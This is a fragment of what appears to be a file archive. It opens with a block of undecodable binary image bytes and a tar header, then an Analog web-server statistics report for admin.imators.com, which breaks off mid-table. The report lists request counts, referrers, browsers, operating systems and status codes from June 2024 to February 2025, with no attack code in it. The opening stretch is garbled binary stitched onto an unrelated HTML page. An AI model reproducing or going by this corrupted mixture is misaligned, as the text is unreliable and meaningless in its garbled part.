c�y}�|��GV�ˌn��mc!�x��|�ƻ0�E��/,�B�"��h�z�H/�b��XH�X�>����0�����|a1�0V�1���0��.-���b,$�Tb��0��*-��b%J�ꡰ~��W�D�*���. +��ZV+�mD ���b,$q�hX}ta +RZ����C�HbE�t�N�0�nD:V'MH� 6"��� �^&+8���~ ���ZT�n& +ЈD�~���hDVGMH��6"m�vԄD,�ѢaueE��-VOKP�<c����d,wl��X���-��7+2�3��X� ,`�c+����PgKuֱׄX��������8v��ub��(�v�� �R%�T��j ���bp�vK��eZ1���%�>Xc+� ��t����|/.�s�dbM\�^���dc�n�������R����a����c�Pca, ����0��X@ca, �k�*�\G/���i}����̷�}a5��E���m�x����5�_�a X�=��5��^����w��o����Jc�[�m���n���r���)�7�2�m�.;�)>���"������������w��� �= ��|��W�O�� �'�DJ=����r}��`a����ֽ��r�?W���������̻�[�K�)b�ߞꡲ�K�������aŲ�� j�[!,�����\lX�HZ���>�q�um��mX�-_��oM��ǚ'��l��a>�y�Է݀�KG���B�CJ-�뀟����}V6�i�4��F��%����ph�;�oo�dVDM6N��ca, ����0��X@ca, ����0�b��� �C�i�:=�A��?o������"��V�#�W��� IEND�B`� 2.html 0000644 00000110442 15114762035 0005601 0 ustar 00 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for admin.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://admin.imators.com/">admin.imators.com</a></h1> <p class="analysisspan">Program started on Fri, Feb 28 2025 at 1:20 PM. <br />Analyzed requests from Fri, Jun 14 2024 at 8:01 PM to Fri, Feb 28 2025 at 2:32 AM (258.27 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Feb 28 2025 at 1:20 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 84 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 25 (0) <br /><span class="gensumtitle">Failed requests:</span> 1,340 (1) <br /><span class="gensumtitle">Redirected requests:</span> 6 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 37 (192) <br /><span class="gensumtitle">Distinct hosts served:</span> 36 (409) <br /><span class="gensumtitle">Data transferred:</span> 42.51 kilobytes (0 bytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 168 bytes (0 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Jun 2024</td><td class="R">26</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2024</td><td class="R">4</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">Aug 2024</td><td class="R">10</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">Sep 2024</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">Oct 2024</td><td class="R">26</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">Nov 2024</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Dec 2024</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Feb 2025</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Jun 2024 (13 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Mon</td><td class="R">9</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Tue</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Wed</td><td class="R">8</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Thu</td><td class="R">12</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">Fri</td><td class="R">48</td><td class="P">19</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">7</td><td class="P">0</td><td class="bar"></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 1</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 2</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 3</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 4</td><td class="R">2</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 5</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 6</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 7</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 8</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 9</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">10</td><td class="R">3</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">11</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">12</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">13</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">14</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">15</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">16</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">17</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">18</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">19</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">20</td><td class="R">26</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">22</td><td class="R">27</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">23</td><td class="R">20</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">84</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">20</td><td class="b">23.31%</td><td class="xl">109</td></tr> <tr><td class="R">10</td><td class="b"> 1.47%</td><td class="xl">194.87</td></tr> <tr><td class="R">10</td><td class="b">16.57%</td><td class="xl">81.245</td></tr> <tr><td class="R">5</td><td class="b"> 1.00%</td><td class="xl">18</td></tr> <tr><td class="R">5</td><td class="b"> 1.00%</td><td class="xl">23</td></tr> <tr><td class="R">4</td><td class="b"> 0.80%</td><td class="xl">13</td></tr> <tr><td class="R">4</td><td class="b"> 4.68%</td><td class="xl">57</td></tr> <tr><td class="R">3</td><td class="b"> 0.60%</td><td class="xl">16</td></tr> <tr><td class="R">3</td><td class="b"> 8.51%</td><td class="xl">165.227</td></tr> <tr><td class="R">3</td><td class="b"> 3.82%</td><td class="xl">213.74</td></tr> <tr><td class="R">3</td><td class="b"> 8.52%</td><td class="xl">64.226</td></tr> <tr><td class="R">2</td><td class="b"> 0.40%</td><td class="xl">54</td></tr> <tr><td class="R">2</td><td class="b">19.46%</td><td class="xl">142.93</td></tr> <tr><td class="R">2</td><td class="b"> 0.40%</td><td class="xl">3</td></tr> <tr><td class="R">1</td><td class="b"> 1.77%</td><td class="xl">172.225</td></tr> <tr><td class="R">1</td><td class="b"> 0.20%</td><td class="xl">52</td></tr> <tr><td class="R">1</td><td class="b"> 0.20%</td><td class="xl">35</td></tr> <tr><td class="R">1</td><td class="b"> 1.77%</td><td class="xl">37</td></tr> <tr><td class="R">1</td><td class="b"> 1.77%</td><td class="xl">104</td></tr> <tr><td class="R">1</td><td class="b"> 1.77%</td><td class="xl">140.248</td></tr> <tr><td class="R">2</td><td class="b"> 1.97%</td><td class="xl">[not listed: 2 organizations]</td></tr> </tbody></table> </div><div class="redirref"><h2><a name="redirref" id="redirref">Redirected Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Redirected Referrer Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./redirref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of redirected requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">3</td><td class="xl"><a href="https://admin.imators.com/index.php">https://admin.imators.com/index.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/">https://admin.imators.com/</a></td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">35</td><td class="xl"><a href="http://www.admin.imators.com/">http://www.admin.imators.com/</a></td></tr> <tr><td class="R">27</td><td class="xl"><a href="https://www.admin.imators.com/">https://www.admin.imators.com/</a></td></tr> <tr><td class="R">22</td><td class="xl"><a href="http://admin.imators.com/">http://admin.imators.com/</a></td></tr> <tr><td class="R">18</td><td class="xl"><a href="https://admin.imators.com/">https://admin.imators.com/</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://admin.imators.com/index.php">https://admin.imators.com/index.php</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://admin.imators.com/dashboard.php">https://admin.imators.com/dashboard.php</a></td></tr> <tr><td class="R">4</td><td class="xl"><a href="https://www.admin.imators.com/autant">https://www.admin.imators.com/autant</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="http://admin.imators.com/gemance.html">http://admin.imators.com/gemance.html</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/invoice.php">https://admin.imators.com/invoice.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/leee-articles-school/process.html">https://admin.imators.com/leee-articles-school/process.html</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://103.26.142.189:2082/">http://103.26.142.189:2082/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://54.206.37.203:123/">https://54.206.37.203:123/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://timetool.adscads.com/">https://timetool.adscads.com/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/mail.php">https://admin.imators.com/mail.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/status.php">https://admin.imators.com/status.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://34.102.195.246/">https://34.102.195.246/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://admin.imators.com/editor.php">https://admin.imators.com/editor.php</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://a.sinsafinejewelry.online/">https://a.sinsafinejewelry.online/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://mdys.mdf031.icu/">https://mdys.mdf031.icu/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">24</td><td class="xl">https://admin.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.admin.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://admin.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://www.admin.imators.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">6</td><td class="P">6</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">6</td><td class="P">5</td><td class="xl">Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1</td></tr> <tr><td class="R">10</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15</td></tr> <tr><td class="R">36</td><td class="P">0</td><td class="xl">[not listed: 3 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">42</td><td class="P">17</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">34</td><td class="P">10</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">5</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Safari/605</td></tr> <tr><td class="N">2</td><td class="R">6</td><td class="P">6</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N"> </td><td class="R">34</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">30</td><td class="P">8</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">30</td><td class="P">8</td><td class="xl"> Windows NT</td></tr> <tr><td class="N">2</td><td class="R">10</td><td class="P">7</td><td class="xl">Macintosh</td></tr> <tr><td class="N">3</td><td class="R">40</td><td class="P">6</td><td class="xl">OS unknown</td></tr> <tr><td class="N">4</td><td class="R">2</td><td class="P">2</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Linux</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">84</td><td class="xl">200 OK</td></tr> <tr><td class="R">6</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">1219</td><td class="xl">401 Authentication required</td></tr> <tr><td class="R">68</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">50</td><td class="xl">404 Document not found</td></tr> <tr><td class="R">3</td><td class="xl">500 Internal server error</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">1</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">35</td><td class="b"> 6.38%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">40</td><td class="b">52.53%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td 